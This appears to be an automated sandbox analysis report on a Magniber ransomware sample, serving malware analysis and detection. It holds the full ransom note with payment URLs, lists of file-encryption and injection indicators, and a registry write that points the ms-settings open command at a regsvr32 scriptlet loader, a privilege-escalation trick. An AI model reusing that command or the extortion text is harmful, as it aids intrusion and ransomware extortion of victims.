magniber | 77d3b1cf6d5a0a07090cdb078dce6e3849465c9acde7e1ba66c3893fefc73d4b

Analysis

max time kernel
121s
max time network
117s
platform
windows10_x64
resource
win10v20210408
submitted
23-08-2021 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3154ded31015965d68a48be47f904ef6.dll
Size

21KB
MD5

3154ded31015965d68a48be47f904ef6
SHA1

914d15ee52a9822fe4138b51cfb713e7d37ed1b8
SHA256

77d3b1cf6d5a0a07090cdb078dce6e3849465c9acde7e1ba66c3893fefc73d4b
SHA512

2cec1fabb86263edb30da9e96c5331f3bfff9c707df588127f7daf45d8de87543b43e5f1472b845a6574d71afe26c386c6c954e29a9924d05ea6851c3f009ed1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://80b40a8014b06a30fxocpbvek.xurvsjipiyubcsta.onion/xocpbvek Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://80b40a8014b06a30fxocpbvek.loglook.club/xocpbvek http://80b40a8014b06a30fxocpbvek.tankmy.space/xocpbvek http://80b40a8014b06a30fxocpbvek.gorise.uno/xocpbvek http://80b40a8014b06a30fxocpbvek.laygive.site/xocpbvek Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://80b40a8014b06a30fxocpbvek.xurvsjipiyubcsta.onion/xocpbvek

http://80b40a8014b06a30fxocpbvek.loglook.club/xocpbvek

http://80b40a8014b06a30fxocpbvek.tankmy.space/xocpbvek

http://80b40a8014b06a30fxocpbvek.gorise.uno/xocpbvek

http://80b40a8014b06a30fxocpbvek.laygive.site/xocpbvek

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1328	3324	cmd.exe	17
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1264	3324	cmd.exe	17

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\SetFormat.png => C:\Users\Admin\Pictures\SetFormat.png.xocpbvek	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\UnprotectResolve.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\UnprotectResolve.tiff => C:\Users\Admin\Pictures\UnprotectResolve.tiff.xocpbvek	rundll32.exe
File renamed	C:\Users\Admin\Pictures\UpdateRepair.tif => C:\Users\Admin\Pictures\UpdateRepair.tif.xocpbvek	rundll32.exe
File renamed	C:\Users\Admin\Pictures\FormatSplit.raw => C:\Users\Admin\Pictures\FormatSplit.raw.xocpbvek	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\ExportDeny.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ExportDeny.tiff => C:\Users\Admin\Pictures\ExportDeny.tiff.xocpbvek	rundll32.exe
File renamed	C:\Users\Admin\Pictures\RedoConvertTo.tif => C:\Users\Admin\Pictures\RedoConvertTo.tif.xocpbvek	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process
PID 3132 set thread context of 0	3132	rundll32.exe
PID 3132 set thread context of 0	3132	rundll32.exe
PID 3132 set thread context of 0	3132	rundll32.exe
PID 3132 set thread context of 0	3132	rundll32.exe
PID 3132 set thread context of 0	3132	rundll32.exe
PID 3132 set thread context of 0	3132	rundll32.exe
PID 3132 set thread context of 0	3132	rundll32.exe
PID 3132 set thread context of 0	3132	rundll32.exe
PID 3132 set thread context of 0	3132	rundll32.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Em = "0"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{EBC28C4D-03B5-4C50-A67D-F378AA64518F}"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\Cach = "MicrosoftEdge\\IECompatUaCache"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CachePrefix = "iedownload:"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileErrorLine = "270"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ie = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\IECompatUaCache"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CacheP = "MicrosoftEdge_iecompat:"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileVersion = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{E5F8F00C-BD00-4776-A2BA-DC1882DD16FD} = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Em = "256"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieUserList\Ca = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\EmieUserList"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList\Ca = "0"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ie	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesVersion = "6"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheRelativePath = "MicrosoftEdge\\User\\Default\\DownloadHistory"	Process not Found
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-3624 = "microsoft.microsoftedge_8wekyb3d8bbwe"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000007dffb7f04dd4520cc751765826e51f5a5507171ad10cc6e552b8ab10ce81129465c1c6b3962e60f40963213b9935160fded50186d474a3b6c8c1	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_DNTException\Ca = "MicrosoftEdge\\User\\Default\\DNTException"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000004e37918fd8b00d8a203082171bee16df760072446ce5447c7de28f884be71346d7e4482d43c896830e8a56dbb24793782d4708b71988e245f7ae	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\Cach = "265"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieSiteList\Ca = "MicrosoftEdge\\User\\Default\\EmieSiteList"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cbbd27c94698d701	MicrosoftEdge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1744	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3132	rundll32.exe
3132	rundll32.exe

Suspicious behavior: MapViewOfSection 9 IoCs

pid	Process
3132	rundll32.exe
3132	rundll32.exe
3132	rundll32.exe
3132	rundll32.exe
3132	rundll32.exe
3132	rundll32.exe
3132	rundll32.exe
3132	rundll32.exe
4232	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeShutdownPrivilege	3020	Process not Found
Token: SeCreatePagefilePrivilege	3020	Process not Found
Token: SeIncreaseQuotaPrivilege	1928	WMIC.exe
Token: SeSecurityPrivilege	1928	WMIC.exe
Token: SeTakeOwnershipPrivilege	1928	WMIC.exe
Token: SeLoadDriverPrivilege	1928	WMIC.exe
Token: SeSystemProfilePrivilege	1928	WMIC.exe
Token: SeSystemtimePrivilege	1928	WMIC.exe
Token: SeProfSingleProcessPrivilege	1928	WMIC.exe
Token: SeIncBasePriorityPrivilege	1928	WMIC.exe
Token: SeCreatePagefilePrivilege	1928	WMIC.exe
Token: SeBackupPrivilege	1928	WMIC.exe
Token: SeRestorePrivilege	1928	WMIC.exe
Token: SeShutdownPrivilege	1928	WMIC.exe
Token: SeDebugPrivilege	1928	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1928	WMIC.exe
Token: SeRemoteShutdownPrivilege	1928	WMIC.exe
Token: SeUndockPrivilege	1928	WMIC.exe
Token: SeManageVolumePrivilege	1928	WMIC.exe
Token: 33	1928	WMIC.exe
Token: 34	1928	WMIC.exe
Token: 35	1928	WMIC.exe
Token: 36	1928	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3668	WMIC.exe
Token: SeSecurityPrivilege	3668	WMIC.exe
Token: SeTakeOwnershipPrivilege	3668	WMIC.exe
Token: SeLoadDriverPrivilege	3668	WMIC.exe
Token: SeSystemProfilePrivilege	3668	WMIC.exe
Token: SeSystemtimePrivilege	3668	WMIC.exe
Token: SeProfSingleProcessPrivilege	3668	WMIC.exe
Token: SeIncBasePriorityPrivilege	3668	WMIC.exe
Token: SeCreatePagefilePrivilege	3668	WMIC.exe
Token: SeBackupPrivilege	3668	WMIC.exe
Token: SeRestorePrivilege	3668	WMIC.exe
Token: SeShutdownPrivilege	3668	WMIC.exe
Token: SeDebugPrivilege	3668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3668	WMIC.exe
Token: SeRemoteShutdownPrivilege	3668	WMIC.exe
Token: SeUndockPrivilege	3668	WMIC.exe
Token: SeManageVolumePrivilege	3668	WMIC.exe
Token: 33	3668	WMIC.exe
Token: 34	3668	WMIC.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
3020	Process not Found
3020	Process not Found
3020	Process not Found
3020	Process not Found
3020	Process not Found
3020	Process not Found
3020	Process not Found
3020	Process not Found

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3020	Process not Found

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3020	Process not Found
364	MicrosoftEdge.exe
4232	MicrosoftEdgeCP.exe
4232	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3132 wrote to memory of 1744	3132	rundll32.exe	74
PID 3132 wrote to memory of 1744	3132	rundll32.exe	74
PID 3132 wrote to memory of 3064	3132	rundll32.exe	76
PID 3132 wrote to memory of 3064	3132	rundll32.exe	76
PID 3132 wrote to memory of 2296	3132	rundll32.exe	77
PID 3132 wrote to memory of 2296	3132	rundll32.exe	77
PID 3132 wrote to memory of 3036	3132	rundll32.exe	80
PID 3132 wrote to memory of 3036	3132	rundll32.exe	80
PID 3036 wrote to memory of 3668	3036	cmd.exe	82
PID 3036 wrote to memory of 3668	3036	cmd.exe	82
PID 2296 wrote to memory of 1928	2296	cmd.exe	83
PID 2296 wrote to memory of 1928	2296	cmd.exe	83
PID 1264 wrote to memory of 2388	1264	cmd.exe	88
